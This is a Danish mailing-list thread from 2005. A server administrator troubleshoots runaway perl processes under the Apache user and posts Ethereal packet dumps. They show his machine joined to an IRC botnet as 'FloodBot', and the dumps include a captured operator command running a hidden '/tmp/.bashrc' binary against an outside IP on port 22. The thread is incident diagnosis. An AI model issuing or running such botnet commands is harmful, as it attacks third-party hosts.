Kasper Dupont wrote:
> "Schultz Consult - [René Madsen]" wrote:
> 
>>Kasper Dupont wrote:
>>
>>>Hvis en zombie process eksisterer i længere tid, må
>>>der være noget galt. Og hvis den samtidigt bliver ved
>>>med at bruge CPU tid, så er der noget rivende galt.
>>>
>>
>>Altså er der noget rivende galt 

 for de eksistere lige fra "angrebet"
>>starter til jeg genstarter maskinen,
> 
> 
> Er deres process ID det samme hele tiden?
> 
> 
>>Kan det have noget med
>>
http://www.securitynet.cz/modules.php?name=News&file=article&sid=351
> 
> 
> Det ved jeg ikke.
> 
> 
>>Det er kun perl processerne der løber løbsk og de er startet af www, som
>>er apache brugeren
> 
> 
> Jeg ville prøve at bruge strace eller noget lignende.
> 
> 
>>Kunne det have nogen sammenhæng?
>>
>>Kommer med dumps fra ethereal når jeg lige får fundet de dele der er
>>interessante 
> 
> 
> OK, det vil i hvert fald være bedre end de logs du
> sendte tidligere.
Her kommer så lige et godt dump 
Internet Protocol, Src Addr: 195.197.175.21 (195.197.175.21), Dst Addr: 
xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx)
     Version: 4
     Header length: 20 bytes
     Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
         0000 00.. = Differentiated Services Codepoint: Default (0x00)
         .... ..0. = ECN-Capable Transport (ECT): 0
         .... ...0 = ECN-CE: 0
     Total Length: 1101
     Identification: 0xbc4b (48203)
     Flags: 0x04
         0... = Reserved bit: Not set
         .1.. = Don't fragment: Set
         ..0. = More fragments: Not set
     Fragment offset: 0
     Time to live: 58
     Protocol: TCP (0x06)
     Header checksum: 0xff5a (correct)
     Source: 195.197.175.21 (195.197.175.21)
     Destination: xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx)
Transmission Control Protocol, Src Port: ircd (6667), Dst Port: 1241 
(1241), Seq: 143, Ack: 79, Len: 1049
     Source port: ircd (6667)
     Destination port: 1241 (1241)
     Sequence number: 143
     Next sequence number: 1192
     Acknowledgement number: 79
     Header length: 32 bytes
     Flags: 0x0018 (PSH, ACK)
         0... .... = Congestion Window Reduced (CWR): Not set
         .0.. .... = ECN-Echo: Not set
         ..0. .... = Urgent: Not set
         ...1 .... = Acknowledgment: Set
         .... 1... = Push: Set
         .... .0.. = Reset: Not set
         .... ..0. = Syn: Not set
         .... ...0 = Fin: Not set
     Window size: 2896
     Checksum: 0x9c00 (correct)
     Options: (12 bytes)
         NOP
         NOP
         Time stamp: tsval 186247759, tsecr 2065064
Internet Relay Chat
     Response Line: :Helsinki.FI.EU.Undernet.org 001 FloodBot :Welcome 
to the UnderNet IRC Network via EUnet Finland, FloodBot
     Response Line: :Helsinki.FI.EU.Undernet.org 002 FloodBot :Your host 
is Helsinki.FI.EU.Undernet.org, running version u2.10.12.beta.09
     Response Line: :Helsinki.FI.EU.Undernet.org 003 FloodBot :This 
server was created Fri Jul 15 2005 at 13:00:56 EEST
     Response Line: :Helsinki.FI.EU.Undernet.org 004 FloodBot 
Helsinki.FI.EU.Undernet.org u2.10.12.beta.09 dioswkgx biklmnopstvrD bklov
     Response Line: :Helsinki.FI.EU.Undernet.org 005 FloodBot WHOX 
WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE SILENCE=15 MODES=6 
MAXCHANNELS=20 MAXBANS=45 NICKLEN=12 MAXNICKLEN=15 TOPICLEN=160 
AWAYLEN=160 KICKLEN=160 CHANNELLEN=200 MAXCHANNEL
     Response Line: :Helsinki.FI.EU.Undernet.org 005 FloodBot 
CHANTYPES=#& PREFIX=(ov)@+ STATUSMSG=@+ CHANMODES=b,k,l,imnpstrD 
CASEMAPPING=rfc1459 NETWORK=UnderNet :are supported by this server
     Response Line: :Helsinki.FI.EU.Undernet.org 251 FloodBot :There are 
34806 users and 75939 invisible on 25 servers
     Response Line: :Helsinki.FI.EU.Undernet.org 252 FloodBot 65 

erator(s) online
et meget langt stykke dump med en masse IRC haløj...
Internet Protocol, Src Addr: 195.197.175.21 (195.197.175.21), Dst Addr: 
xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx)
     Version: 4
     Header length: 20 bytes
     Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
         0000 00.. = Differentiated Services Codepoint: Default (0x00)
         .... ..0. = ECN-Capable Transport (ECT): 0
         .... ...0 = ECN-CE: 0
     Total Length: 157
     Identification: 0xbceb (48363)
     Flags: 0x04
         0... = Reserved bit: Not set
         .1.. = Don't fragment: Set
         ..0. = More fragments: Not set
     Fragment offset: 0
     Time to live: 58
     Protocol: TCP (0x06)
     Header checksum: 0x026b (correct)
     Source: 195.197.175.21 (195.197.175.21)
     Destination: xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx)
Transmission Control Protocol, Src Port: ircd (6667), Dst Port: 1241 
(1241), Seq: 87058, Ack: 233, Len: 105
     Source port
: ircd (6667)
     Destination port: 1241 (1241)
     Sequence number: 87058
     Next sequence number: 87163
     Acknowledgement number: 233
     Header length: 32 bytes
     Flags: 0x0018 (PSH, ACK)
         0... .... = Congestion Window Reduced (CWR): Not set
         .0.. .... = ECN-Echo: Not set
         ..0. .... = Urgent: Not set
         ...1 .... = Acknowledgment: Set
         .... 1... = Push: Set
         .... .0.. = Reset: Not set
         .... ..0. = Syn: Not set
         .... ...0 = Fin: Not set
     Window size: 2896
     Checksum: 0xef81 (correct)
     Options: (12 bytes)
         NOP
         NOP
         Time stamp: tsval 186372766, tsecr 2075732
Internet Relay Chat
     Response Line: :aluP!root@aluP.users.undernet.org PRIVMSG 
#bimartethakiya 

shellcmd /tmp/.bashrc 217.158.132.142 22 0
Frame 117564 (112 bytes on wire, 112 bytes captured)
     Arrival Time: Jul 19, 2005 18:26:04.075282000
     Time delta from previous packet: 0.000551000 seconds
     Time since reference or first frame: 17861.245181000 seconds
     Frame Number: 117564
     Packet Length: 112 bytes
     Capture Length: 112 bytes
Ethernet II, Src: 00:30:6e:05:92:7f, Dst: 00:07:b3:8c:cc:00
     Destination: 00:07:b3:8c:cc:00 (xxx.xxx.xxx.yyy)
     Source: 00:30:6e:05:92:7f (xxx.xxx.xxx.xxx)
     Type: IP (0x0800)
xxx.xxx.xxx.xxx er freebsdmaskinens IP adresse og xxx.xxx.xxx.yyy er 
dens gateway, adresserne er sløret for en sikkerhedsskyld
busted...
/tmp/.bashrc 217.158.132.142 22 0
eller en ligende kommando har ofte stået som kørende i en ps -aux...
Det næste spørgsmål er så, hvordan er den fil så kommet ind på min 
maskine og hvordan er det lige at de kan have noget IRC haløj kørende 
"hen over" min maskine...
-- 
Med venlig hilsen
René Madsen
Schultz Consult